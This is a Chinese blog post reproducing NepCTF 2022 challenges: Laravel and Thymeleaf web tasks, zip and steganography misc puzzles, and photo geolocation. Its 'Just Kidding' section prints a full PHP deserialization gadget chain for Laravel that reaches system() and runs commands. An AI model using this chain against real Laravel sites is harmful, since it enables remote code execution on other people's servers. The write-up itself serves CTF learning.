[NepCTF2022] 复现

最新推荐文章于 2024-04-12 09:07:39 发布
最新推荐文章于 2024-04-12 09:07:39 发布
阅读量823 收藏
点赞数
分类专栏: 比赛wp 文章标签: php 安全 ctf 网络协议 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/125874427
版权

Just Kidding

顽皮的HRP用Laravel写了个项目来欢迎大伙来玩Nepctf 2nd,没想到…居然被坏蛋Sharun撅了

www.zip源码泄露  ,啥也不懂没注意正确的入口在哪里,一直把注意力放在web.php上面 

没有注意到这里use导入类的路径,跟着路径找到反序列化入口

 

当时写的过程,确实9.12.2的版本也是用网上流传的9.1.8的链子可以打,

当时就是没找到正确的入口和路径 

 

https://github.com/1nhann/vulns/issues

pop1,直接rce  

<?php
namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = "system";

        }
    }
}

namespace Illuminate\Broadcasting{

    use Illuminate\Contracts\Queue\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function __construct()
        {

        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "ls /";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}
namespace{
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}

 注意payload路径 ,上传后 访问源码可以看到成功rce的回显

 

Challenger

顽皮的HRP又换了种语言写项目来欢迎大家,没想到又让Sharun掘了

java的框架,给了jar, 反编译

目前没学过java,所以跟着wp走一遍,也是网上的链子打

 Java安全之Thymeleaf 模板注入分析 - nice_0e3 - 博客园

 

 

 

 

签到题

binwalk分离图片

得到压缩包套娃

import zipfile

a=""
for i in range(232,2,-1):
  a=str(i)+".zip"
  print(a)
  with zipfile.ZipFile(a) as zf:
    zf.extractall()

芃哥给的脚本解压,解压到最后

 

本来找密码爆破,其实是伪加密

看文件名也知道是键盘流量了

王一航Usb脚本梭

少见的base 

附件就一个jpg试了一下没出来啥信息就放下了,没想到是真签到

JPHS这工具很少用就忘了, 无密码直接seek 就出来了

 base58 

 

花花画画画花花 

附件下载后 是个osz后缀, 当时用010看是压缩包文件头,就改后缀了。。。。

 要正确打开osz文件 

 osu打开,这个是个音乐游戏吧,

 

 

馅饼?陷阱!

右下角有个车牌琼,写的时候都没发现,尚德源茶 定位到三亚 发现正好是这里

左上角就是银行

 

 

ThnPkm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
GDOUCTF2023 Crypto Pwn
qq_41626232的博客
04-16 526
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间。这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用。参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据。我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的。我直接把fake的base64密文全删了,然后就给了一个压缩包出来了。这不是misc题吗?
NEEPUSec CTF 2023 Loss
Emmaaaaa's blog
06-02 1186
确实是一开始没注意到0的缺失,只知道缺失了,当时看到myhex()函数以为就是单纯的字节转16进制,但后面转念一想如果只是普通的转法,大可直接用byte_data.hex(),所以说都是有含义的啊。技不如人,没什么好说的,坚持学吧。怎么讲呢,就发现自己越多不会,动力还就越大了。
一文打通DES算法以及在ctf中的运用!【附2024NepCTF simpleDES巨细题解~】_ctf des
最新发布
2401_83621095的博客
04-12 390
我们暂时把经过S盒处理的32bits排列称为L则P(L)的输出格式和P盒相同输出的第一位 就是根据P盒第一位获得的数值16 提取L中第16位的数值到此回顾整个加密流程就解释清楚了。
Neepu Sec 2023公开赛Reverse题目复现
OrientalGlass的博客
05-22 939
可以看到做了对flag的判断,分别截取flag的不同部分并调用不同的check函数最后将加密结果拼接起来并输出结果。text是密文,bytes是密钥,并且可以看到Mode是ECB,PaddingMode是PKCS7。sha256,也就是把上面得到的结果拼接起来进行hash(也可以运行程序通过验证得到flag)最后组合到的掩码Neepu{Pyth0n_1s_a_t?​将程序用dnSpy打开后,点击From1,可以找到check1~check5函数。可以发现是C#编写的,使用dnSpy分析。
NepCTF2023复现
leekos的博客,分享web安全相关知识~
08-16 4096
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
NepCTF2022 Writeup
个人博客:https://www.mrzry.top
07-19 1055
NepCTF2022 Writeup
论文复现-深度补全算法
03-10
1、传统深度不全算法复现 2、详细内容可见:https://blog.csdn.net/qq_43627520/article/details/123344654?spm=1001.2014.3001.5502 3、复现代码可直接运行、包含有测试用例、以及验证代码
使用numpy复现贝叶斯网络
10-16
在这个主题中,我们将深入探讨如何使用Python的科学计算库NumPy来复现贝叶斯网络的基本概念和操作。NumPy是Python生态系统中的核心库,提供了高效的多维数组对象和各种数学函数,非常适合进行数值计算。 首先,我们...
NepCTF2022
qq_53263789的博客
07-19 1207
nepctf2022 wp
CTF国赛2023 - ukfc(四道逆向已下班)
qq_59700927的博客
05-28 2294
小明拿到了内网一个老旧服务的应用包,虽然有漏洞但是怎么利用他呢?这个函数中,%s读取字节无上限,导致缓冲区可以溢出到返回地址,由此我们着重进入这个函数并执行rop链。没有负数检查,直接减掉10*v9,那我们可以减掉一个大负数使得money大于100000。可以确定的是最后三位地址一定不会发生变化,那只需要对第四位爆破0xf位地址即可。有canary,原题:CSDN Canary学习(爆破Canary)程序是有pie的,我们直接修改下两位地址即可。先传入L文件,在传入R文件,然后。其中有flag,找到即可。
2023最新CTF入门的正确姿势
Forget_liu的博客
05-24 2426
CTF全称为Capture The Flag,是一种网络安全技术竞赛,旨在提供一个具有挑战性的平台,让参赛者在不同领域(例如密码学、逆向工程、Web和二进制漏洞等)的技术挑战中展示自己的能力。CTF比赛最初起源于全球各大高校的安全技术课程中,由教授和学生组成的团队一起参加,在许多大型的安全技术会议中也均设有CTF比赛环节。CTF比赛一般由各种安全领域的问题和难题组成,参赛者需要利用自己的知识和技能从中寻找答案,并在时间限制内成功攻克它们。比赛通常由不同的阶段组成,每个阶段有不同的挑战和难度级别。
[CTF]-NepCTF2022
Mr.木Mu
07-20 4676
扫目录有 下载得到源码 代码审计 发现这个 php 文件中有一个反序列化的函数,存在反序列化漏洞查找 方法 跟进 中的 方法, 可以看到这里的 和 均为可控的, 寻找可用的 方法 这里跟进 中的 方法, 这里的 和 均是可控的.跟进 方法, 和 均是可控的,不难看出可以利用该方法中的 方法来进行命令执行的利用.现在需要解决的就是命令执行的语句, 注意到上图中的代码 这里可以通过 中的类中变量来控制 从而达到命令执行的目的. Challenger 代码审计 利用 模板
NepCTF2022-个人Writeup
m0_61596829的博客
07-17 1761
NepCTF2022-个人Writeup
nepctf
qq_53263789的博客
08-17 324
nepctf2022
NepCTF2022 招新赛 crypto篇
m0_62506844的博客
07-21 782
动态更新至全部复现完成还是太菜了,看了wp依然是学到了很多,发现nep的密码师傅们经验也太丰富了! 根据加密流程,可以构造等式: P(P(P(P(P(Pm+k0)+k1)+k2)+k3)+k4)+k5=m∗P6+∑Pik5−iP(P(P(P(P(Pm+k0)+k1)+k2)+k3)+k4)+k5=m*P^6+\sum P^ik_{5-i}P(P(P(P(P(Pm+k0)+k1)+k2)+k3)+k4)+k5=m∗P6+∑Pik5−i​ 已知明文前四个字节 “flag”,和密文,也就是已知一组明密文,利用已知
NepCTF2022 WEB 博学多闻的花花详解
SHININGENDING的博客
07-18 1036
有意思的一道题
cve-2022-40684复现
10-12
复现CVE-2022-40684,您可以按照以下步骤进行操作: 1. 确保您在本地或测试环境中安装了WordPress,并且已经安装了Contact Form 7插件。 2. 登录WordPress管理后台,并激活Contact Form 7插件。 3. 创建一个新的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值